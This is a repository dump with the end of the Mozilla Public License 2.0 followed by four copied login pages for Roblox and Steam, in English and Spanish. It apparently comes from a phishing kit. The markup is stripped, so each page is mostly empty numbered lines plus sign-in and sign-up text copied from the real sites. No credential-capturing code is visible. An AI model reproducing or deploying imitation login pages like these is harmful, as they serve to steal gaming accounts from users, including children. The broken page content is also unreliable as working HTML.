inform recipients of 176 | the Executable Form how they can obtain a copy of such Source Code 177 | Form by reasonable means in a timely manner, at a charge no more 178 | than the cost of distribution to the recipient; and 179 | 180 | (b) You may distribute such Executable Form under the terms of this 181 | License, or sublicense it under different terms, provided that the 182 | license for the Executable Form does not attempt to limit or alter 183 | the recipients' rights in the Source Code Form under this License. 184 | 185 | 3.3. Distribution of a Larger Work 186 | 187 | You may create and distribute a Larger Work under terms of Your choice, 188 | provided that You also comply with the requirements of this License for 189 | the Covered Software. If the Larger Work is a combination of Covered 190 | Software with a work governed by one or more Secondary Licenses, and the 191 | Covered Software is not Incompatible With Secondary Licenses, this 192 | License permits You to additionally distribute such Covered Software 193 | under the terms of such Secondary License(s), so that the recipient of 194 | the Larger Work may, at their option, further distribute the Covered 195 | Software under the terms of either this License or such Secondary 196 | License(s). 197 | 198 | 3.4. Notices 199 | 200 | You may not remove or alter the substance of any license notices 201 | (including copyright notices, patent notices, disclaimers of warranty, 202 | or limitations of liability) contained within the Source Code Form of 203 | the Covered Software, except that You may alter any license notices to 204 | the extent required to remedy known factual inaccuracies. 205 | 206 | 3.5. Application of Additional Terms 207 | 208 | You may choose to offer, and to charge a fee for, warranty, support, 209 | indemnity or liability obligations to one or more recipients of Covered 210 | Software. However, You may do so only on Your own behalf, and not on 211 | behalf of any Contributor. You must make it absolutely clear that any 212 | such warranty, support, indemnity, or liability obligation is offered by 213 | You alone, and You hereby agree to indemnify every Contributor for any 214 | liability incurred by such Contributor as a result of warranty, support, 215 | indemnity or liability terms You offer. You may include additional 216 | disclaimers of warranty and limitations of liability specific to any 217 | jurisdiction. 218 | 219 | 4. Inability to Comply Due to Statute or Regulation 220 | --------------------------------------------------- 221 | 222 | If it is impossible for You to comply with any of the terms of this 223 | License with respect to some or all of the Covered Software due to 224 | statute, judicial order, or regulation then You must: (a) comply with 225 | the terms of this License to the maximum extent possible; and (b) 226 | describe the limitations and the code they affect. Such description must 227 | be placed in a text file included with all distributions of the Covered 228 | Software under this License. Except to the extent prohibited by statute 229 | or regulation, such description must be sufficiently detailed for a 230 | recipient of ordinary skill to be able to understand it. 231 | 232 | 5. Termination 233 | -------------- 234 | 235 | 5.1. The rights granted under this License will terminate automatically 236 | if You fail to comply with any of its terms. However, if You become 237 | compliant, then the rights granted under this License from a particular 238 | Contributor are reinstated (a) provisionally, unless and until such 239 | Contributor explicitly and finally terminates Your grants, and (b) on an 240 | ongoing basis, if such Contributor fails to notify You of the 241 | non-compliance by some reasonable means prior to 60 days after You have 242 | come back into compliance. Moreover, Your grants from a particular 243 | Contributor are reinstated on an ongoing basis if such Contributor 244 | notifies You of the non-compliance by some reasonable means, this is the 245 | first time You have received notice of non-compliance with this License 246 | from such Contributor, and You become compliant prior to 30 days after 247 | Your receipt of the notice. 248 | 249 | 5.2. If You initiate litigation against any entity by asserting a patent 250 | infringement claim (excluding declaratory judgment actions, 251 | counter-claims, and cross-claims) alleging that a Contributor Version 252 | directly or indirectly infringes any patent, then the rights granted to 253 | You by any and all Contributors for the Covered Software under Section 254 | 2.1 of this License shall terminate. 255 | 256 | 5.3. In the event of termination under Sections 5.1 or 5.2 above, all 257 | end user license agreements (excluding distributors and resellers) which 258 | have been validly granted by You or Your distributors under this License 259 | prior to termination shall survive termination. 260 | 261 | ************************************************************************ 262 | * * 263 | * 6. Disclaimer of Warranty * 264 | * ------------------------- * 265 | * * 266 | * Covered Software is provided under this License on an "as is" * 267 | * basis, without warranty of any kind, either expressed, implied, or * 268 | * statutory, including, without limitation, warranties that the * 269 | * Covered Software is free of defects, merchantable, fit for a * 270 | * particular purpose or non-infringing. The entire risk as to the * 271 | * quality and performance of the Covered Software is with You. * 272 | * Should any Covered Software prove defective in any respect, You * 273 | * (not any Contributor) assume the cost of any necessary servicing, * 274 | * repair, or correction. This disclaimer of warranty constitutes an * 275 | * essential part of this License. No use of any Covered Software is * 276 | * authorized under this License except under this disclaimer. * 277 | * * 278 | ************************************************************************ 279 | 280 | ************************************************************************ 281 | * * 282 | * 7. Limitation of Liability * 283 | * -------------------------- * 284 | * * 285 | * Under no circumstances and under no legal theory, whether tort * 286 | * (including negligence), contract, or otherwise, shall any * 287 | * Contributor, or anyone who distributes Covered Software as * 288 | * permitted above, be liable to You for any direct, indirect, * 289 | * special, incidental, or consequential damages of any character * 290 | * including, without limitation, damages for lost profits, loss of * 291 | * goodwill, work stoppage, computer failure or malfunction, or any * 292 | * and all other commercial damages or losses, even if such party * 293 | * shall have been informed of the possibility of such damages. This * 294 | * limitation of liability shall not apply to liability for death or * 295 | * personal injury resulting from such party's negligence to the * 296 | * extent applicable law prohibits such limitation. Some * 297 | * jurisdictions do not allow the exclusion or limitation of * 298 | * incidental or consequential damages, so this exclusion and * 299 | * limitation may not apply to You. * 300 | * * 301 | ************************************************************************ 302 | 303 | 8. Litigation 304 | ------------- 305 | 306 | Any litigation relating to this License may be brought only in the 307 | courts of a jurisdiction where the defendant maintains its principal 308 | place of business and such litigation shall be governed by laws of that 309 | jurisdiction, without reference to its conflict-of-law provisions. 310 | Nothing in this Section shall prevent a party's ability to bring 311 | cross-claims or counter-claims. 312 | 313 | 9. Miscellaneous 314 | ---------------- 315 | 316 | This License represents the complete agreement concerning the subject 317 | matter hereof. If any provision of this License is held to be 318 | unenforceable, such provision shall be reformed only to the extent 319 | necessary to make it enforceable. Any law or regulation which provides 320 | that the language of a contract shall be construed against the drafter 321 | shall not be used to construe this License against a Contributor. 322 | 323 | 10. Versions of the License 324 | --------------------------- 325 | 326 | 10.1. New Versions 327 | 328 | Mozilla Foundation is the license steward. Except as provided in Section 329 | 10.3, no one other than the license steward has the right to modify or 330 | publish new versions of this License. Each version will be given a 331 | distinguishing version number. 332 | 333 | 10.2. Effect of New Versions 334 | 335 | You may distribute the Covered Software under the terms of the version 336 | of the License under which You originally received the Covered Software, 337 | or under the terms of any subsequent version published by the license 338 | steward. 339 | 340 | 10.3. Modified Versions 341 | 342 | If you create software not governed by this License, and you want to 343 | create a new license for such software, you may create and use a 344 | modified version of this License if you rename the license and remove 345 | any references to the name of the license steward (except to note that 346 | such modified license differs from this License). 347 | 348 | 10.4. Distributing Source Code Form that is Incompatible With Secondary 349 | Licenses 350 | 351 | If You choose to distribute Source Code Form that is Incompatible With 352 | Secondary Licenses under the terms of this version of the License, the 353 | notice described in Exhibit B of this License must be attached. 354 | 355 | Exhibit A - Source Code Form License Notice 356 | ------------------------------------------- 357 | 358 | This Source Code Form is subject to the terms of the Mozilla Public 359 | License, v. 2.0. If a copy of the MPL was not distributed with this 360 | file, You can obtain one at http://mozilla.org/MPL/2.0/. 361 | 362 | If it is not possible or desirable to put the notice in a particular 363 | file, then You may include the notice in a location (such as a LICENSE 364 | file in a relevant directory) where a recipient would be likely to look 365 | for such a notice. 366 | 367 | You may add additional accurate notices of copyright ownership. 368 | 369 | Exhibit B - "Incompatible With Secondary Licenses" Notice 370 | --------------------------------------------------------- 371 | 372 | This Source Code Form is "Incompatible With Secondary Licenses", as 373 | defined by the Mozilla Public License, v. 2.0. 374 | -------------------------------------------------------------------------------- /pages/roblox_en/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Roblox 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 |
89 | 90 |
91 |
92 |
93 |
94 | 95 | 96 | 97 | 98 | 99 |
100 | 101 |
102 | 103 | 104 | 152 | 153 | 154 | 155 |
156 | 157 | 158 |
159 | 160 | 161 | 162 | 163 | 164 |
165 | 166 | 167 |
168 | 169 | 170 | 171 | 172 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 |
189 |
190 | 191 |
192 |
193 | 194 | 195 |
196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 221 | 229 | 230 | 231 | 232 | 233 | 234 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 270 | 271 | 306 | 307 |
308 |
309 | 310 |
311 | 312 |
313 | 314 |
315 | 316 | 317 | -------------------------------------------------------------------------------- /pages/roblox_es/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Roblox 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 |
89 | 90 |
91 |
92 |
93 |
94 | 95 | 96 | 97 | 98 | 99 |
100 | 101 |
102 | 103 | 104 | 152 | 153 | 154 | 155 |
156 | 157 | 158 |
159 | 160 | 161 | 162 | 163 | 164 |
165 | 166 | 167 |
168 | 169 | 170 | 171 | 172 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 |
189 |
190 | 191 |
192 |
193 | 194 | 195 |
196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 221 | 229 | 230 | 231 | 232 | 233 | 234 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 270 | 271 | 306 | 307 |
308 |
309 | 310 |
311 | 312 |
313 | 314 |
315 | 316 | 317 | -------------------------------------------------------------------------------- /pages/Steam/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Steam Community 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 42 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 |
64 | 65 | 120 | 121 |
122 | 123 |
124 | 125 |
126 |
127 |
128 |
129 |
130 |
131 | 132 | 133 | 134 |
135 |
136 | 139 | 142 |
143 |
144 | 145 |
146 | 147 |
148 | 149 |
150 |
151 | 152 |
153 | 154 | 250 | 267 | 268 |
269 | 270 | 271 | 272 | 273 | 292 | 293 |
294 | 295 |
296 |
297 |

Iniciar sesión

298 |

A una cuenta de Steam existente

299 | 300 |
301 | 347 | 348 | 349 | 352 |
353 |
354 | 355 |
356 | 357 |
358 |
359 |

Crear

360 |

Una nueva cuenta gratuita

361 |

Es gratis unirse y fácil de usar. Continúe para crear su cuenta Steam y obtenga Steam, la solución digital líder para juegos y software para PC, Mac y Linux.

362 |
363 | Unete a Steam 364 |
365 | 366 | 367 |
368 |
369 | 370 |
371 | 372 | 373 |
374 |

¿Por qué unirse a Steam?

375 |
    376 |
  • Compra y descarga juegos minoristas completos
  • 377 |
  • Disponible para PC, Mac y Linux
  • 378 |
  • Recibir actualizaciones automáticas del juego
  • 379 |
  • Descargar extras del Workshop
  • 380 |
  • Chat de voz y texto con amigos
  • 381 |
  • Ver la actividad y el estado de amigos
  • 382 |
  • Califica y comenta en Game Hubs
  • 383 |
  • Únete o crea grupos y eventos
384 |

Más información sobre Steam

385 |

Instalar Steam

386 |
387 | 388 |
389 |
390 | 4,453,377 En el juego   |   391 | 15,705,845 En línea 392 |
393 | 394 |
395 | 396 |
397 | 398 |
399 | 400 |
401 | 506 | 507 | 538 | 539 | 540 | 541 | 764 |
765 | 766 |
767 | 768 | 769 | 770 | 788 | 789 |
790 | 791 |
792 | 793 | 794 | -------------------------------------------------------------------------------- /pages/Steam_en/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Steam Community 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 42 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 |
64 | 65 | 120 | 121 |
122 | 123 |
124 | 125 |
126 |
127 |
128 |
129 |
130 |
131 | 132 | 133 | 134 |
135 |
136 | 139 | 142 |
143 |
144 | 145 |
146 | 147 |
148 | 149 |
150 |
151 | 152 |
153 | 154 | 254 | 271 | 272 |
273 | 274 | 275 | 276 | 277 | 296 | 297 |
298 | 299 |
300 |
301 |

Sign In

302 |

To an existing Steam account

303 | 304 |
305 | 351 | 352 | 353 | 356 |
357 |
358 | 359 |
360 | 361 |
362 |
363 |

Create

364 |

A new free account

365 |

It's free to join and easy to use. Continue on to create your Steam account and get Steam, the leading digital solution for PC, Mac, and Linux games and Software.

366 |
367 | Join Steam 368 |
369 | 370 | 371 |
372 |
373 | 374 |
375 | 376 | 377 |
378 |

Why Join Steam?

379 |
    380 |
  • Buy and download full retail games
  • 381 |
  • Available for PC, Mac, and Linux
  • 382 |
  • Receive automatic game updates
  • 383 |
  • Download extras from the Workshop
  • 384 |
  • Voice and text chat with friends
  • 385 |
  • View rich friend activity and status
  • 386 |
  • Rate and comment on Game Hubs
  • 387 |
  • Join or create groups and events
388 |

Learn more about Steam

389 |

Install Steam

390 |
391 | 392 |
393 |
394 | 4,453,377 In-Game   |   395 | 15,705,845 Online 396 |
397 | 398 |
399 | 400 |
401 | 402 |
403 | 404 |
405 | 510 | 511 | 542 | 543 | 544 | 545 | 768 |
769 | 770 |
771 | 772 | 773 | 774 | 792 | 793 |
794 | 795 |
796 | 797 | 798 | --------------------------------------------------------------------------------